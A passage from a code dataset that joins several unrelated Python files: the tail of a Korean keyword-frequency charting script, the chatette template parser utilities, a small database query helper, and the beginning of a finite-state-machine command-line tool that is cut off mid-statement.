Category_frequence_dict = { x:0 for x in Category_dict }\n for word in top_word_list:\n for k,v_list in Category_dict.items():\n if word in v_list:\n Category_frequence_dict[k] += 1\n if word in Category_detail[k]:\n Category_detail[k][word] += 1\n else:\n Category_detail[k][word] = 1\n detail_val_list = []\n detail_index_list = []\n for k1,indict in Category_detail.items():\n for k2,val in indict.items():\n detail_val_list.append(val)\n detail_index_list.append(k2)\n\n detailFrame = pd.DataFrame(detail_val_list,index=detail_index_list)\n detailFrame.columns = ['개수']\n\n CategoryFrame = pd.DataFrame(Category_frequence_dict,index=[0])\n CategoryFrame = CategoryFrame.T\n CategoryFrame.columns = ['개수']\n CategoryFrame = CategoryFrame.loc[CategoryFrame['개수']>0]\n\n # 관심 카테고리 비중 그래프 그리기 ########################\n plt.figure()\n CategoryFrame['개수'].plot(kind='pie',autopct='%.2f%%')\n plt.title(f'{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_업데이트_{label}_관심카테고리')\n\n category_file_name = f'pie_graph_category_{label}.png'\n plt.savefig(category_file_name, dpi=600, bbox_inches='tight')\n\n print(CategoryFrame.index)\n\n # 키워드별 빈도 막대 그래프 :\n plt.figure()\n barFrame = pd.DataFrame(top_word_list,columns=['kwd'])\n barGroup = barFrame.groupby(by='kwd')['kwd']\n bardata = barGroup.count()\n\n\n bardata.plot(kind='barh')\n plt.title(f'{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_{label}_카테고리_세부내역')\n bar_file_name = f'bar_graph_category_{label}.png'\n plt.savefig(bar_file_name, dpi=600, bbox_inches='tight')\n # plt.show()\n\n fig, ax = plt.subplots()\n\n size = 0.3\n vals = np.array([[60., 32.], [37., 40.], [29., 10.]])\n\n cmap = plt.get_cmap(\"tab20c\")\n outer_colors = cmap(np.arange(3) * 4)\n inner_colors = cmap(np.array([1, 2, 5, 6, 9, 10]))\n\n ax.pie(CategoryFrame['개수'],labeldistance=1.1, labels=CategoryFrame.index,radius=1, colors=outer_colors,\n wedgeprops=dict(width=size, edgecolor='w'))\n\n ax.pie(detailFrame['개수'],labeldistance=0.7,labels=detailFrame.index, radius=1 - size, colors=inner_colors,\n wedgeprops=dict(width=size, edgecolor='w'))\n\n ax.set(aspect=\"equal\", title='Pie plot with `ax.pie`')\n plt.show()\n\n # top_Series = pd.Series(top_10_list)\n # result = top_Series.value_counts()\n # top_dict = dict()\n # for x in result.items():\n # top_dict[x[0]] = x[1]\n\n # 워드 클라우드에 사용할 top 10\n # top_10_list = []\n # for textid,row in scoreFrame.T.iterrows():\n # sort_key = row.sort_values(ascending=False)[:10].index\n # print(sort_key)\n # top_10_list.extend(sort_key)\n #\n # top_Series = pd.Series(top_10_list)\n # result = top_Series.value_counts()\n # top_dict = dict()\n # for x in result.items():\n # top_dict[x[0]] = x[1]\n\n ########## 워드 클라우드###########\n # plt.figure()\n # mask = np.array(Image.open(image_path[label]))\n #\n # image_color = ImageColorGenerator(mask)\n #\n # wc = WordCloud(font_path='malgun.ttf', max_words=100, mask=mask,\n # background_color='rgba(255,255,255,0)', mode='RGBA', random_state=43)\n # wc.generate_from_frequencies(top_dict)\n # newwc = wc.recolor(color_func=image_color)\n # plt.imshow(wc)\n # plt.title(f'update_{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일')\n # plt.axis('off')\n #\n # # 워드클라우드 이미지로 저장하기\n # wcimgfilename = f'keyword_wordcloud/wcd_{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_{label}.png'\n # plt.savefig(wcimgfilename, dpi=600, bbox_inches='tight')\n # print(wcimgfilename + '파일이 저장되었습니다.')\n # plt.close()\n ##########\n # end 감정별 데이터 분석\n\n # 각 업데이트별 데이터 분석\n\n\n# 업데이트 하나만 가지고 테스트 해본다.\nprint(forFrame.iloc[[0],:])\nanalyData(forFrame.iloc[[1],:])","sub_path":"업데이트별 리뷰 가중치행렬 카테고리 분석/uclid_matrix_keyword.py","file_name":"uclid_matrix_keyword.py","file_ext":"py","file_size_in_byte":16498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"355386238","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule `chatette.parsing.parser_utils`\nContains utility functions that are specific to\nthe parsing of template files.\n\"\"\"\n\n\nimport re\nfrom enum import Enum\n\nfrom chatette import deprecations\nimport chatette.modifiers.representation as mods\n\nCOMMENT_SYM_DEPRECATED = ';'\nCOMMENT_MARKER = '//'\nESCAPE_SYM = '\\\\'\n\nALIAS_SYM = '~'\nSLOT_SYM = '@'\nINTENT_SYM = '%'\nUNIT_OPEN_SYM = '[' # This shouldn't be changed\nUNIT_CLOSE_SYM = ']' # id.\n\nANNOTATION_OPEN_SYM = '('\nANNOTATION_CLOSE_SYM = ')'\nANNOTATION_SEP = ','\nANNOTATION_ASSIGNMENT_SYM = ':'\nANNOTATION_IGNORED_SYM = \"'\"\n\nCHOICE_OPEN_SYM = r'{'\nCHOICE_CLOSE_SYM = r'}'\nCHOICE_SEP = '/' # TODO: deprecate and rather use '|'\n\nVARIATION_SYM = '#'\nRAND_GEN_SYM = '?' # This shouldn't be changed\nPERCENT_GEN_SYM = '/'\nCASE_GEN_SYM = '&'\nARG_SYM = '$' # This shouldn't be changed\n\nALT_SLOT_VALUE_NAME_SYM = '='\nALT_SLOT_VALUE_FIRST_SYM = '/'\n\nINCLUDE_FILE_SYM = '|'\n\n# TODO add special characters at the beginning of those to prevent people from\n# using them by chance\nRESERVED_VARIATION_NAMES = [\"all-variations-aggregation\", \"rules\",\n \"nb-gen-asked\", \"arg\"]\n\n\nPATTERN_COMMENT_DEPRECATED = re.compile(r\"(?= length:\n return None\n\n end_index = starting_index\n nb_closing_brackets_expected = 1\n while end_index < length and nb_closing_brackets_expected > 0:\n if tokens[end_index] == UNIT_OPEN_SYM:\n nb_closing_brackets_expected += 1\n elif tokens[end_index] == UNIT_CLOSE_SYM:\n nb_closing_brackets_expected -= 1\n end_index += 1\n end_index -= 1\n if end_index == starting_index:\n return None\n\n return tokens[starting_index:end_index]\n\ndef get_annotation_interior(tokens):\n \"\"\"\n Returns a list of tokens that represent the inside of the annotation\n that is present on this line.\n Returns `None` if there is no annotation in `tokens`.\n \"\"\"\n length = len(tokens)\n starting_index = 0\n while starting_index < length and tokens[starting_index] != ANNOTATION_OPEN_SYM:\n starting_index += 1\n starting_index += 1\n if starting_index >= length:\n return None\n\n end_index = starting_index\n nb_closing_brackets_expected = 1\n while end_index < length and nb_closing_brackets_expected > 0:\n if tokens[end_index] == ANNOTATION_OPEN_SYM:\n nb_closing_brackets_expected += 1\n elif tokens[end_index] == ANNOTATION_CLOSE_SYM:\n nb_closing_brackets_expected -= 1\n end_index += 1\n end_index -= 1\n if end_index == starting_index:\n return None\n\n return tokens[starting_index:end_index]\n\n\ndef check_declaration_validity(tokens_unit_inside):\n \"\"\"\n Check that the interior of a declaration is syntactically legal.\n Raises a `SyntaxError` if the declaration is invalid.\n The constraints checked are:\n - there is only one modifier of each type\n - there are no randgen or percentgen modifiers\n - `&` is at the beginning of the declaration (or nowhere)\n - there is a name after `#`\n - there is a value after `$`\n - there is a name either after `&` or at the beginning\n - the variation names are not reserved\n \"\"\"\n casegen_count = tokens_unit_inside.count(CASE_GEN_SYM)\n if casegen_count > 1:\n raise SyntaxError(\"There can be only one case generation modifier \"+\n \"in a unit declaration.\")\n if casegen_count == 1 and tokens_unit_inside.index(CASE_GEN_SYM) != 0:\n raise SyntaxError(\"Case generation modifiers have to be at the start \"+\n \"of a unit declaration.\")\n\n if casegen_count == 0 and is_special_sym(tokens_unit_inside[0]):\n raise SyntaxError(\"Unit declarations must be named.\")\n elif casegen_count == 1 and len(tokens_unit_inside) <= 1:\n raise SyntaxError(\"Unit declarations must be named.\")\n elif casegen_count == 1 and is_special_sym(tokens_unit_inside[1]):\n raise SyntaxError(\"Unit declarations must be named.\")\n\n variation_count = tokens_unit_inside.count(VARIATION_SYM)\n if variation_count > 1:\n raise SyntaxError(\"There can be only one variation modifier \"+\n \"in a unit declaration.\")\n if variation_count == 1:\n variation_name_index = tokens_unit_inside.index(VARIATION_SYM)+1\n if variation_name_index >= len(tokens_unit_inside) \\\n or is_special_sym(tokens_unit_inside[variation_name_index]):\n raise SyntaxError(\"Variations must be named.\")\n variation_name = tokens_unit_inside[variation_name_index]\n if variation_name in RESERVED_VARIATION_NAMES:\n raise SyntaxError(\"The following variation names are reserved: \"+\n str(RESERVED_VARIATION_NAMES)+\". Please don't \"+\n \"use them.\")\n\n argument_count = tokens_unit_inside.count(ARG_SYM)\n if argument_count > 1:\n raise SyntaxError(\"There can be only one argument modifier \"+\n \"per unit declaration.\")\n if argument_count == 1:\n argument_name_index = tokens_unit_inside.index(ARG_SYM)+1\n if argument_name_index >= len(tokens_unit_inside) \\\n or is_special_sym(tokens_unit_inside[argument_name_index]):\n raise SyntaxError(\"Arguments must be named.\")\n\n # TODO remove the following because you should allow ? and / in declarations?\n # or the tokenizer should not consider them special characters in this\n # case\n randgen_count = tokens_unit_inside.count(RAND_GEN_SYM)\n if randgen_count > 0:\n raise SyntaxError(\"Unit declarations cannot take a random generation \"+\n \"modifier.\")\n percentgen_count = tokens_unit_inside.count(PERCENT_GEN_SYM)\n if percentgen_count > 0:\n raise SyntaxError(\"Unit declarations cannot take a percentage for \"+\n \"the random generation modifier.\")\n\n\ndef check_reference_validity(tokens_unit_inside):\n \"\"\"\n Check that the interior of a reference is syntactically legal.\n Raises a `SyntaxError` if the reference is invalid.\n The constraints checked are:\n - there is only one modifier of each type\n - `/` is not there unless `?` is there\n - there is a number between 0 and 100 if `/` is present\n - `&` is at the beginning of the declaration (or nowhere)\n - there is a name after `#`\n - there is a name either after `&` or at the beginning\n \"\"\"\n casegen_count = tokens_unit_inside.count(CASE_GEN_SYM)\n if casegen_count > 1:\n raise SyntaxError(\"There can be only one case generation modifier \"+\n \"in a unit reference.\")\n if casegen_count == 1 and tokens_unit_inside.index(CASE_GEN_SYM) != 0:\n raise SyntaxError(\"Case generation modifiers have to be at the start \"+\n \"of a unit reference.\")\n\n if casegen_count == 0 and is_special_sym(tokens_unit_inside[0]):\n raise SyntaxError(\"Unit references must be named.\")\n elif casegen_count == 1 and len(tokens_unit_inside) <= 1:\n raise SyntaxError(\"Unit references must be named.\")\n elif casegen_count == 1 and is_special_sym(tokens_unit_inside[1]):\n raise SyntaxError(\"Unit references must be named.\")\n\n variation_count = tokens_unit_inside.count(VARIATION_SYM)\n if variation_count > 1:\n raise SyntaxError(\"There can be only one variation modifier \"+\n \"in a unit reference.\")\n if variation_count == 1:\n variation_name_index = tokens_unit_inside.index(VARIATION_SYM)+1\n if variation_name_index >= len(tokens_unit_inside) \\\n or is_special_sym(tokens_unit_inside[variation_name_index]):\n raise SyntaxError(\"Variations must be named.\")\n variation_name = tokens_unit_inside[variation_name_index]\n if variation_name in RESERVED_VARIATION_NAMES:\n raise SyntaxError(\"The following variation names are reserved: \"+\n str(RESERVED_VARIATION_NAMES)+\". Please don't \"+\n \"use them.\")\n\n argument_count = tokens_unit_inside.count(ARG_SYM)\n if argument_count > 1:\n raise SyntaxError(\"There can be only one argument modifier \"+\n \"per unit reference.\")\n # if argument_count == 1:\n # argument_name_index = tokens_unit_inside.index(ARG_SYM)+1\n # if argument_name_index >= len(tokens_unit_inside) \\\n # or is_special_sym(tokens_unit_inside[argument_name_index]):\n # raise SyntaxError(\"Arguments must be named.\")\n\n randgen_count = tokens_unit_inside.count(RAND_GEN_SYM)\n if randgen_count > 1:\n raise SyntaxError(\"There can be only one random generation modifier \"+\n \"per unit reference.\")\n percentgen_count = tokens_unit_inside.count(PERCENT_GEN_SYM)\n if percentgen_count > 1:\n raise SyntaxError(\"There can be only one percentage for generation \"+\n \"modifier per unit reference.\")\n if percentgen_count == 1 and randgen_count == 0:\n raise SyntaxError(\"There cannot be a percentage for generation \"+\n \"modifier if there is no random generation modifier \"+\n \"(did you mean to escape '\"+PERCENT_GEN_SYM+\"'?)\")\n if percentgen_count == 1:\n index_randgen = tokens_unit_inside.index(RAND_GEN_SYM)\n index_percentgen = tokens_unit_inside.index(PERCENT_GEN_SYM)\n if index_randgen > index_percentgen:\n raise SyntaxError(\"A percentage for generation modifier must \"+\n \"always be right after the random generation \"+\n \"modifier.\")\n if index_percentgen == len(tokens_unit_inside)-1:\n raise SyntaxError(\"No percentage found after the special symbol \"+\n \"for percentage modifier.\")\n try:\n percentgen = int(tokens_unit_inside[index_percentgen+1])\n except ValueError:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"an integer.\")\n if percentgen < 0 or percentgen > 100:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"between 0 and 100.\")\n\ndef check_choice_validity(tokens_choice_inside):\n \"\"\"\n Check that the interior of a choice is syntactically legal.\n Deals with word groups as well.\n Raises a `SyntaxError` if the choice is invalid.\n As any sub-rules can be inside choices, we cannot check anything except\n that the last tokens is not a separator (or the two-to-last one if the\n last one is a random generation modifier).\n \"\"\"\n # TODO: deprecate `/` as choice separators AND percentgen\n # percentgen_count = tokens_choice_inside.count(PERCENT_GEN_SYM)\n # if percentgen_count > 0:\n # raise SyntaxError(\"Choices cannot take a percentage for generation \"+\n # \"modifier.\")\n if len(tokens_choice_inside) > 0:\n if tokens_choice_inside[-1] == CHOICE_SEP:\n raise SyntaxError(\"Choice cannot end with a choice separator. \" +\n \"Did you forget to escape the last character?\")\n if ( len(tokens_choice_inside) > 1\n and tokens_choice_inside[-1] == RAND_GEN_SYM\n and tokens_choice_inside[-2] == CHOICE_SEP):\n raise SyntaxError(\"Choice ends with an empty choice item. \" +\n \"Did you forget to escape the choice separator?\")\n\n\ndef check_word_group_validity(tokens_word_group_inside):\n \"\"\"\n Check that the interior of a choice is syntactically legal.\n Deals with word groups as well.\n Raises a `SyntaxError` if the choice is invalid.\n The constraints checked are:\n - there is only one modifier of each type\n - `/` and `#` are not there\n - `&` is at the beginning of the declaration (or nowhere)\n - choices are separated by '/' (not checked as there can be 0 or 1 choice)\n \"\"\"\n casegen_count = tokens_word_group_inside.count(CASE_GEN_SYM)\n if casegen_count > 1:\n raise SyntaxError(\"There can be only one case generation modifier \"+\n \"in a word group.\")\n if casegen_count == 1 and tokens_word_group_inside.index(CASE_GEN_SYM) != 0:\n raise SyntaxError(\"Case generation modifiers have to be at the start \"+\n \"of a word group.\")\n\n variation_count = tokens_word_group_inside.count(VARIATION_SYM)\n if variation_count > 0:\n raise SyntaxError(\"Word groups cannot take variation modifiers.\")\n\n argument_count = tokens_word_group_inside.count(ARG_SYM)\n if argument_count > 0:\n raise SyntaxError(\"Word groups cannot take arguments.\")\n\n randgen_count = tokens_word_group_inside.count(RAND_GEN_SYM)\n if randgen_count > 1:\n raise SyntaxError(\"There can be only one random generation modifier \"+\n \"per word group.\")\n percentgen_count = tokens_word_group_inside.count(PERCENT_GEN_SYM)\n if percentgen_count > 1:\n raise SyntaxError(\"There can be only one percentage for generation \"+\n \"modifier per word group.\")\n if percentgen_count == 1 and randgen_count == 0:\n raise SyntaxError(\"There cannot be a percentage for generation \"+\n \"modifier if there is no random generation modifier \"+\n \"(did you mean to escape '\"+PERCENT_GEN_SYM+\"'?)\")\n if percentgen_count == 1:\n index_randgen = tokens_word_group_inside.index(RAND_GEN_SYM)\n index_percentgen = tokens_word_group_inside.index(PERCENT_GEN_SYM)\n if index_randgen > index_percentgen:\n raise SyntaxError(\"A percentage for generation modifier must \"+\n \"always be right after the random generation \"+\n \"modifier.\")\n if index_percentgen == len(tokens_word_group_inside)-1:\n raise SyntaxError(\"No percentage found after the special symbol \"+\n \"for percentage modifier.\")\n try:\n percentgen = int(tokens_word_group_inside[index_percentgen+1])\n except ValueError:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"an integer.\")\n if percentgen < 0 or percentgen > 100:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"between 0 and 100.\")\n\n\ndef find_name(tokens_inside_unit):\n \"\"\"\n Finds the name of the unit from the tokens that represent the interior of\n a unit declaration or reference (inside the brackets (excluded)).\n @pre: there is no syntax error in this part.\n \"\"\"\n start_index = 0\n if tokens_inside_unit[0] == CASE_GEN_SYM:\n start_index = 1\n name = \"\"\n while ( start_index < len(tokens_inside_unit)\n and not is_special_sym(tokens_inside_unit[start_index])):\n name += tokens_inside_unit[start_index]\n start_index += 1\n return remove_escapement(name)\n\ndef find_words(tokens_inside_word_group):\n \"\"\"\n Finds the words in the tokens that represent the interior of a word group.\n Returns the list of those words in sequence.\n @pre: there is no syntax error in this part.\n \"\"\"\n words = []\n for token in tokens_inside_word_group:\n if token == CASE_GEN_SYM:\n continue\n if token in (RAND_GEN_SYM, VARIATION_SYM, ARG_SYM):\n return words\n words.append(token)\n return words\n\n\ndef find_modifiers_decl(tokens_inside_decl):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a unit declaration. Returns the representation.\n If the percentage of generation was present but couldn't be\n @pre: there is no syntax error in this part (except possibly for\n percentage of generation).\n \"\"\"\n modifiers = mods.UnitDeclarationModifiersRepr()\n\n i = 0\n if tokens_inside_decl[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n i += 1\n\n expecting_variation = False\n expecting_argument = False\n while i < len(tokens_inside_decl):\n if tokens_inside_decl[i] == VARIATION_SYM:\n modifiers.variation_name = \"\"\n expecting_variation = True\n expecting_argument = False\n elif tokens_inside_decl[i] == ARG_SYM:\n modifiers.argument_name = \"\"\n expecting_variation = False\n expecting_argument = True\n elif expecting_variation:\n modifiers.variation_name += tokens_inside_decl[i]\n elif expecting_argument:\n modifiers.argument_name += tokens_inside_decl[i]\n i += 1\n\n modifiers.variation_name = remove_escapement(modifiers.variation_name)\n modifiers.argument_name = remove_escapement(modifiers.argument_name)\n\n return modifiers\n\ndef find_modifiers_reference(tokens_inside_reference):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a reference. Returns the representation.\n @pre: there is no syntax error in this part.\n \"\"\"\n modifiers = mods.ReferenceModifiersRepr()\n\n i = 0\n if tokens_inside_reference[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n i += 1\n\n expecting_randgen_name = False\n expecting_percentgen = False\n expecting_variation = False\n expecting_argument = False\n while i < len(tokens_inside_reference):\n if tokens_inside_reference[i] == RAND_GEN_SYM:\n modifiers.randgen_name = \"\"\n expecting_randgen_name = True\n expecting_percentgen = False\n expecting_variation = False\n expecting_argument = False\n elif tokens_inside_reference[i] == PERCENT_GEN_SYM:\n expecting_randgen_name = False\n expecting_percentgen = True\n expecting_variation = False\n expecting_argument = False\n elif tokens_inside_reference[i] == VARIATION_SYM:\n modifiers.variation_name = \"\"\n expecting_randgen_name = False\n expecting_percentgen = False\n expecting_variation = True\n expecting_argument = False\n elif tokens_inside_reference[i] == ARG_SYM:\n modifiers.argument_value = \"\"\n expecting_randgen_name = False\n expecting_percentgen = False\n expecting_variation = False\n expecting_argument = True\n elif expecting_randgen_name:\n modifiers.randgen_name += tokens_inside_reference[i]\n elif expecting_percentgen:\n modifiers.percentage_randgen = int(tokens_inside_reference[i])\n expecting_percentgen = False\n elif expecting_variation:\n modifiers.variation_name += tokens_inside_reference[i]\n elif expecting_argument:\n modifiers.argument_value += tokens_inside_reference[i]\n i += 1\n\n modifiers.randgen_name = remove_escapement(modifiers.randgen_name)\n modifiers.variation_name = remove_escapement(modifiers.variation_name)\n modifiers.argument_value = remove_escapement(modifiers.argument_value)\n\n return modifiers\n\ndef find_modifiers_word_group(tokens_inside_word_group):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a word group. Returns the representation.\n @pre: there is no syntax error in this part.\n \"\"\"\n modifiers = mods.WordGroupModifiersRepr()\n\n i = 0\n if tokens_inside_word_group[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n i += 1\n\n expecting_randgen_name = False\n expecting_percentgen = False\n while i < len(tokens_inside_word_group):\n if tokens_inside_word_group[i] == RAND_GEN_SYM:\n modifiers.randgen_name = \"\"\n expecting_randgen_name = True\n expecting_percentgen = False\n elif tokens_inside_word_group[i] == PERCENT_GEN_SYM:\n expecting_percentgen = True\n expecting_randgen_name = False\n elif expecting_randgen_name:\n modifiers.randgen_name += tokens_inside_word_group[i]\n elif expecting_percentgen:\n modifiers.percentage_randgen = int(tokens_inside_word_group[i])\n expecting_percentgen = False\n i += 1\n\n modifiers.randgen_name = remove_escapement(modifiers.randgen_name)\n\n return modifiers\n\ndef find_modifiers_choice(tokens_inside_choice):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a choice. Returns the representation.\n @pre: there is no syntax error in this part.\n \"\"\"\n modifiers = mods.ChoiceModifiersRepr()\n\n if tokens_inside_choice[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n if tokens_inside_choice[-1] == RAND_GEN_SYM:\n modifiers.randgen = True\n\n return modifiers\n\n\ndef find_nb_examples_asked(annotation_interior):\n \"\"\"\n Returns the training and testing number of examples asked for an intent\n declaration as a tuple. Returns `None` if the numbers given are not numbers.\n @pre: there is no syntax error in the annotation.\n \"\"\"\n if len(annotation_interior) == 0:\n return None\n nb_train = None\n nb_test = None\n\n if len(annotation_interior) == 1:\n nb_train = annotation_interior[0]\n else:\n expecting_train = False\n expecting_test = False\n for token in annotation_interior:\n if ( token not in (ANNOTATION_ASSIGNMENT_SYM, ANNOTATION_SEP)\n and not token.isspace()):\n if PATTERN_NB_TRAIN_EX_KEY.match(token):\n expecting_train = True\n elif PATTERN_NB_TEST_EX_KEY.match(token):\n expecting_test = True\n elif expecting_train:\n nb_train = token\n expecting_train = False\n elif expecting_test:\n nb_test = token\n expecting_test = False\n\n if nb_train is None and nb_test is None:\n return None\n\n if nb_train is not None:\n nb_train = nb_train.replace(ANNOTATION_IGNORED_SYM, \"\")\n if nb_test is not None:\n nb_test = nb_test.replace(ANNOTATION_IGNORED_SYM, \"\")\n\n try:\n nb_train = int(nb_train)\n if nb_test is None:\n nb_test = 0\n else:\n nb_test = int(nb_test)\n except ValueError:\n return None\n return (nb_train, nb_test)\n\n\ndef find_alt_slot_and_index(slot_rule_tokens):\n \"\"\"\n Returns the index of the equal sign and the alt slot value as a 2-tuple,\n from the tokens representing a slot rule. Returns `None` if no alt slot\n value was found.\n @pre: there is no syntax error in this part.\n \"\"\"\n try:\n index = slot_rule_tokens.index(ALT_SLOT_VALUE_NAME_SYM)\n except ValueError:\n return None\n if index+1 < len(slot_rule_tokens):\n i = index+1\n alt_slot_val = slot_rule_tokens[i]\n if alt_slot_val == ' ':\n alt_slot_val = \"\"\n i += 1\n while i < len(slot_rule_tokens):\n alt_slot_val += slot_rule_tokens[i]\n i += 1\n return (index, remove_escapement(alt_slot_val))\n return None\n\n\ndef next_choice_tokens(choice_interior_tokens):\n \"\"\"\n Yields the next choice as a list of tokens in `choice_interior_tokens`.\n @pre: there is no syntax error in this part.\n \"\"\"\n current_choice = []\n for (i, token) in enumerate(choice_interior_tokens):\n if token == CASE_GEN_SYM:\n continue\n elif token == RAND_GEN_SYM:\n if i == len(choice_interior_tokens)-1: # Random generation symbol\n # NOTE: this should be changed if named randgen or percentgen\n # is supported in the future.\n break\n else: # Not a random generation symbol\n current_choice.append(token)\n elif token == CHOICE_SEP:\n yield current_choice\n current_choice = []\n else:\n current_choice.append(token)\n yield current_choice\n\n\n\ndef next_sub_rule_tokens(tokens):\n \"\"\"\n Yields the next sub-rule from a rule\n represented as tokens (i.e. a list of str).\n @pre: `tokens` represents a valid rule.\n \"\"\"\n current_sub_rule = []\n stop_with_char = None\n reading_sub_rule = False\n for token in tokens:\n if reading_sub_rule:\n if token == stop_with_char:\n current_sub_rule.append(token)\n yield current_sub_rule\n current_sub_rule = []\n stop_with_char = None\n reading_sub_rule = False\n else:\n current_sub_rule.append(token)\n else: # Looking for the start of a sub-rule\n if is_start_unit_sym(token): # Unit reference starting point\n current_sub_rule.append(token)\n reading_sub_rule = True\n stop_with_char = UNIT_CLOSE_SYM\n elif token == UNIT_OPEN_SYM: # Word group starting point\n current_sub_rule.append(token)\n reading_sub_rule = True\n stop_with_char = UNIT_CLOSE_SYM\n elif token == CHOICE_OPEN_SYM: # Word group starting point\n current_sub_rule.append(token)\n reading_sub_rule = True\n stop_with_char = CHOICE_CLOSE_SYM\n else: # Word\n yield [token]\n\n\ndef is_sub_rule_word(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens` represents a word.\n @pre: considers `sub_rule_tokens` is never a single space.\n \"\"\"\n return len(sub_rule_tokens) == 1\ndef is_sub_rule_word_group(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents a word group.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == UNIT_OPEN_SYM\ndef is_sub_rule_choice(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents a choice.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == CHOICE_OPEN_SYM\ndef is_sub_rule_alias_ref(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents an alias reference.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == ALIAS_SYM\ndef is_sub_rule_slot_ref(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents a slot reference.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == SLOT_SYM\ndef is_sub_rule_intent_ref(sub_rule_tokens):\n \"\"\"\n Returns `True` if the list of str `sub_rule_tokens`\n represents an intent reference.\n @pre: considers `sub_rule_tokens` to be a valid sub-rule.\n \"\"\"\n return sub_rule_tokens[0] == INTENT_SYM\n","sub_path":"chatette/parsing/parser_utils.py","file_name":"parser_utils.py","file_ext":"py","file_size_in_byte":36916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"646559958","text":"from ConnectDataBase import ConnectDataBase\n\n#class for insert elements in data base\nclass HandlerQuery:\n\n\t#method for insert, delete or update element in table\n\tdef insertToTable(self, query, ConnectionDB):\n\t\tConnectionDB.cursor.execute(query)\n\t\tConnectionDB.Conex.commit()\n\t\t#self.ConnectionDB.cursor.close()\n\n\t#method for generate basic query to data base\n\tdef queryBasicDataBase(self, query, ConnectionDB):\n\t\tConnectionDB.cursor.execute(query)\n\n\t\tcollection_id = []\n\t\tfor element in ConnectionDB.cursor:\n\n\t\t\tcollection_id.append(element)\n\n\t\treturn collection_id\n","sub_path":"view/view/admin/pythonScripts/CrudDataBase.py","file_name":"CrudDataBase.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"620487960","text":"import sys\r\nfrom args import Args, print_exit\r\nfrom fsm import FSM\r\nfrom minimalize import Minimize\r\n\r\n# ----------------------------------< --analyze-string >---------------------------------------#\r\ndef analyze_string(string, automata):\r\n for char in string:\r\n if char not in automata[\"alphabet\"]:\r\n print_exit('0', 1)\r\n\r\n state = automata[\"start\"]\r\n char_cnt = 0\r\n str_len = len(string)\r\n\r\n for char in string:\r\n found = False\r\n \r\n for rule in automata[\"rules\"]:\r\n if rule.c == char and rule.s1 == state:\r\n state = rule.s2\r\n char_cnt += 1\r\n found = True\r\n break;\r\n \r\n if found is False:\r\n return '0'\r\n\r\n if rule.s2 not in automata[\"finals\"]:\r\n return '0'\r\n else:\r\n return '1'\r\n\r\n# -------------------------------------< FINAL OUTPUT >-----------------------------------------#\r\ndef print_FSM(fsm):\r\n str = \"(\\n{\"\r\n\r\n # all states\r\n for state in fsm[\"states\"]:\r\n str += state+', '\r\n str = str[0:-2]+'},\\n{'\r\n\r\n # alphabet\r\n for char in fsm[\"alphabet\"]:\r\n str += '\\''+char+'\\', '\r\n str = str[0:-2]+'},\\n{\\n'\r\n\r\n # rules\r\n for rule in fsm[\"rules\"]:\r\n str += rule+',\\n'\r\n\r\n # start state\r\n str = str[0:-2] + '\\n},\\n' + fsm[\"start\"] + ',\\n{'\r\n\r\n # final states\r\n for state in fsm[\"finals\"]:\r\n str += state+', '\r\n str = str[0:-2]+'}\\n)\\n'\r\n\r\n return str\r\n\r\n# ----------------------------------------------------------------------------------------------#\r\n#Parse arguments\r\nargs = Args()\r\n#Check arguments\r\nargs.check_args()\r\n\r\n#Print help if exists switch\r\nif args.argv.help is True:\r\n if len(sys.argv) != 2:\r\n print_exit(\"Wrong arguments1.\", 1)\r\n print(args.print_help())\r\n sys.exit(0)\r\n\r\n#Use stdin if --input switch does not exist\r\nif args.argv.input is None:\r\n inputFile = sys.stdin\r\nelse:\r\n try:\r\n inputFile = open(args.argv.input, mode=\"r\", newline=\"\", encoding=\"utf-8\")\r\n except IOError:\r\n print_exit(\"Opening input file failed.\", 2)\r\n\r\n#Use stdout if --output switch does not exist\r\nif args.argv.output is None:\r\n outputFile = sys.stdout\r\nelse:\r\n try:\r\n outputFile = open(args.argv.output, mode=\"w\", newline=\"\", encoding=\"utf-8\")\r\n except IOError:\r\n print_exit(\"Opening output file failed.\", 3)\r\n\r\n#Let the scanner do the work and get us all the tokens.\r\nWSFA = FSM(inputFile.read(), args)\r\n\r\n# final output based on command line options\r\nif args.argv.analyze is not None:\r\n ret = analyze_string(args.argv.analyze, WSFA.automata)\r\n outputFile.write(ret)\r\n\r\nelif args.argv.f is True:\r\n outputFile.write(WSFA.nonFinState)\r\n\r\nelif args.argv.m is 